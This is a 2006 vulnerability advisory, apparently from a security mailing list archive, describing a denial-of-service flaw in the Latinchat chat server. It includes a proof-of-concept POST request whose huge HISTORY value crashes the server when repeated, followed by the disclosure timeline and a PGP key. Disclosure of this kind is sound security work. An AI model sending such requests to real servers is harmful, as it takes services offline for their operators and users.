Denial Of Service on Chat Magma Latinchat http://www.latinchat.com Researcher: Vicente Perez 1.-Overview Latinchat is one of the most known chat server, and used basically by latin american people. 2.-Description This system has a vulnerabily as DoS, taking system offline by a while. The fail happens when the histroy variable is not properly checked by system, and when the request, is modified by a mal intencionated user, can take the system down. History variable is used to show the last X messages sent to the room before the conexion takes place. A POC has been writed as: POST /JAVA HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) Referer: http://www.disp006-org.latinchat.com Content-length: 142 UserName=Pentest&SessionID=C247b19b2a&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999 When this URL is sent for a spefied times, the server crash. 4.- Disclosure Timeout Vendor COntacted: 08-Julio-2006 Vendor never response. Public Advisory: 08-Agosto-2006 5.- Copyright http://www.securitynation.com - Security Nation is a Lab Supported by RISS Security Services. http://www.riss.com.mx vicente.perez@private Copyright SecurityNation. Contact: vp.vicenteperez@private -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.5 (MingW32) - WinPT 0.9.92 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 v5epLj9RxxnqdWDtT2vy2uHx0j9X =V9Ch -----END PGP PUBLIC KEY BLOCK-----
This archive was generated by hypermail 2.1.3 : Wed Aug 09 2006 - 18:10:03 PDT